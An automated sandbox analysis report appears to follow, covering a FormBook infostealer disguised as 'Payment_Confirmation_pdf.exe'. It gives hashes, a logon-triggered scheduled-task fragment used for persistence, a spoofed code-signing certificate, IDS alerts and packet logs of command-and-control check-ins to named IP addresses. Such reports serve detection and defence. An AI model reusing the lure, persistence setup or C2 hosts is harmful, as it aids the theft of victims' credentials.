MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp6A84.tmp

Download File

Process:	C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1202983725775955
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTHuv
MD5:	A1249FE0AF4EB6C383CD5D84A8E7A5F2
SHA1:	044667F1D617DB3A75FD973FD477B867C44ED416
SHA-256:	0CA4DC59CB0836AE80A0A3210009366B21E824BED02702115F6297FE15E7E28D
SHA-512:	2FAB8EF0D18C173B3FAF2D9193CAF70032A7C608DE8E4485B167E4EB4BBFD78093248A98CDF450C0FF419564F4F0EF9849C32EDCC90F6647025F59A84FB4341D
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\cQwRvD.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1202983725775955
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtHaxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTHuv
MD5:	A1249FE0AF4EB6C383CD5D84A8E7A5F2
SHA1:	044667F1D617DB3A75FD973FD477B867C44ED416
SHA-256:	0CA4DC59CB0836AE80A0A3210009366B21E824BED02702115F6297FE15E7E28D
SHA-512:	2FAB8EF0D18C173B3FAF2D9193CAF70032A7C608DE8E4485B167E4EB4BBFD78093248A98CDF450C0FF419564F4F0EF9849C32EDCC90F6647025F59A84FB4341D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\cQwRvD.exe

Download File

Process:	C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	861704
Entropy (8bit):	7.659730691957718
Encrypted:	false
SSDEEP:	24576:3oQ1dzG4CqqUZltSYTWQThVb63Dc9apeCC:zdzGhqFltSDQlVb6zc5CC
MD5:	DBB00CEAC5C3C668BDBB0C91DF825BE7
SHA1:	E865268EE5DE35A4FD0C4754A43A27AD1126BB72
SHA-256:	F600CD0546FA26D446A964C8520A7016313990D8D9886AE84778F5B474DC814E
SHA-512:	DC7B5202F3A3E15C8E50C8CF6071A2AE7E966D555BC79D834769E9DCF1C72BB9D428804A2B8E3049B77776FE012E0D16C0BF2B3D79FA270A1C0D1270A9B22C65
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Fg..............0.................. ........@.. .......................@............@.....................................O........................6... ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........`.......5...l...`...........................................".(%........0..6.............s&.....('.....o(..........o)...o..........+......................0..b........s+....(,.....o-......o.....+..o/...t..........o(...o0...&..o1...-....u........,...o2........+.............)E.......0..^........s+....(,......o3...o.....+..o/...t........o4...o0...&..o1...-....u........,...o2........+...*..........'A.......0..^........s+....(5......o6...o.....+..o/...t........o4...

C:\Users\user\AppData\Roaming\cQwRvD.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.659730691957718
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment_Confirmation_pdf.exe
File size:	861'704 bytes
MD5:	dbb00ceac5c3c668bdbb0c91df825be7
SHA1:	e865268ee5de35a4fd0c4754a43a27ad1126bb72
SHA256:	f600cd0546fa26d446a964c8520a7016313990d8d9886ae84778f5b474dc814e
SHA512:	dc7b5202f3a3e15c8e50c8cf6071a2ae7e966d555bc79d834769e9dcf1c72bb9d428804a2b8e3049b77776fe012e0d16c0bf2b3d79fa270a1c0d1270a9b22c65
SSDEEP:	24576:3oQ1dzG4CqqUZltSYTWQThVb63Dc9apeCC:zdzGhqFltSDQlVb6zc5CC
TLSH:	BC0502946374C606E1E60B70A8B0C3B523B57E85B412E31B9BE8ECEB3D657416D0B3D6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Fg..............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	53084c444c441845

Static PE Info

General

Entrypoint:	0x4cf31e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67461F90 [Tue Nov 26 19:20:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	12/11/2018 19:00:00 08/11/2021 18:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcf2cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd0000	0x1694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcf000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcd324	0xcd400	2c6c59d67d07a01e8446baa8c99499b8	False	0.8552498858099878	data	7.66363017602626	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd0000	0x1694	0x1800	51a9a7b244178259d97bf441709be5a0	False	0.7150065104166666	data	6.7297863733534244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd2000	0xc	0x200	96e3e60fe3b9a8e3d1cffd46316e778d	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xd0100	0xfbe	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.892803970223325
RT_GROUP_ICON	0xd10d0	0x14	data	1.05
RT_VERSION	0xd10f4	0x3a0	data	0.41810344827586204
RT_MANIFEST	0xd14a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-27T08:55:03.951497+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49810	103.224.182.242	80	TCP
2024-11-27T08:55:21.212102+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49849	118.107.250.103	80	TCP
2024-11-27T08:55:23.883923+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49859	118.107.250.103	80	TCP
2024-11-27T08:55:26.556719+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49865	118.107.250.103	80	TCP
2024-11-27T08:55:29.257259+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49871	118.107.250.103	80	TCP
2024-11-27T08:55:45.962255+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49908	163.44.185.183	80	TCP
2024-11-27T08:55:48.537493+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49917	163.44.185.183	80	TCP
2024-11-27T08:55:51.290303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49923	163.44.185.183	80	TCP
2024-11-27T08:55:53.964205+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49929	163.44.185.183	80	TCP
2024-11-27T08:56:02.587195+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49950	120.26.240.121	80	TCP
2024-11-27T08:56:05.260056+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49956	120.26.240.121	80	TCP
2024-11-27T08:56:07.920593+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49962	120.26.240.121	80	TCP
2024-11-27T08:56:10.666117+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49970	120.26.240.121	80	TCP
2024-11-27T08:56:17.723762+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49988	209.74.77.108	80	TCP
2024-11-27T08:56:22.397291+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49996	209.74.77.108	80	TCP
2024-11-27T08:56:25.106201+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49997	209.74.77.108	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 08:55:02.576994896 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:02.697016001 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:02.697144032 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:02.716839075 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:02.836813927 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:03.951308966 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:03.951390028 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:03.951423883 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:03.951497078 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:03.951525927 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:03.954655886 CET	49810	80	192.168.2.7	103.224.182.242
Nov 27, 2024 08:55:04.074481964 CET	80	49810	103.224.182.242	192.168.2.7
Nov 27, 2024 08:55:19.553369045 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:19.673594952 CET	80	49849	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:19.673697948 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:19.696070910 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:19.816076040 CET	80	49849	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:21.212101936 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:21.295358896 CET	80	49849	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:21.295432091 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:21.295449018 CET	80	49849	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:21.295516014 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:21.332118988 CET	80	49849	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:21.332238913 CET	49849	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:22.230607033 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:22.350625038 CET	80	49859	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:22.354038000 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:22.368973970 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:22.488985062 CET	80	49859	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:23.883923054 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:23.960669994 CET	80	49859	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:23.960726976 CET	80	49859	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:23.960745096 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:23.960772038 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:24.003864050 CET	80	49859	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:24.003948927 CET	49859	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:24.902745962 CET	49865	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:25.024812937 CET	80	49865	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:25.024945021 CET	49865	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:25.040004969 CET	49865	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:25.162082911 CET	80	49865	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:25.162224054 CET	80	49865	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:26.556719065 CET	49865	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:26.677217007 CET	80	49865	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:26.677269936 CET	49865	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:27.576302052 CET	49871	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:27.696327925 CET	80	49871	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:27.696468115 CET	49871	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:27.705939054 CET	49871	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:27.825886011 CET	80	49871	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:29.256972075 CET	80	49871	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:29.257055044 CET	80	49871	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:29.257258892 CET	49871	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:29.260204077 CET	49871	80	192.168.2.7	118.107.250.103
Nov 27, 2024 08:55:29.380111933 CET	80	49871	118.107.250.103	192.168.2.7
Nov 27, 2024 08:55:44.315335989 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:44.435297966 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:44.435441971 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:44.453521013 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:44.574886084 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.962255001 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:45.976119041 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976160049 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976171017 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976286888 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:45.976309061 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976322889 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976356030 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:45.976414919 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976425886 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976438046 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976445913 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:45.976449966 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976463079 CET	80	49908	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:45.976571083 CET	49908	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:46.981877089 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:47.102009058 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:47.102164984 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:47.119599104 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:47.239866018 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537363052 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537409067 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537422895 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537481070 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537493944 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537492990 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.537507057 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537522078 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537561893 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.537578106 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.537733078 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537746906 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537763119 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.537787914 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.537827969 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.634078979 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.657587051 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.657601118 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.657731056 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.657773018 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.707470894 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.707532883 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.707545042 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.707583904 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.729089975 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.729182005 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.729212046 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.729243994 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.733314991 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.733380079 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.734813929 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.734884024 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.734899998 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.734956980 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:48.741766930 CET	80	49917	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:48.741847038 CET	49917	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:49.653701067 CET	49923	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:49.773917913 CET	80	49923	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:49.774113894 CET	49923	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:49.789228916 CET	49923	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:49.910919905 CET	80	49923	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:49.910936117 CET	80	49923	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:51.290302992 CET	49923	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:51.410708904 CET	80	49923	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:51.410774946 CET	49923	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:52.309003115 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:52.428927898 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:52.429080009 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:52.438808918 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:52.558779955 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964023113 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964051962 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964063883 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964128017 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964139938 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964152098 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964164972 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964205027 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:53.964243889 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:53.964356899 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964370012 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964396954 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:53.964462042 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:53.964498997 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.084208012 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.084280968 CET	80	49929	163.44.185.183	192.168.2.7
Nov 27, 2024 08:55:54.084409952 CET	49929	80	192.168.2.7	163.44.185.183
Nov 27, 2024 08:55:54.174422026 CET	80	49929	163.44.185.183	192.168.2.7
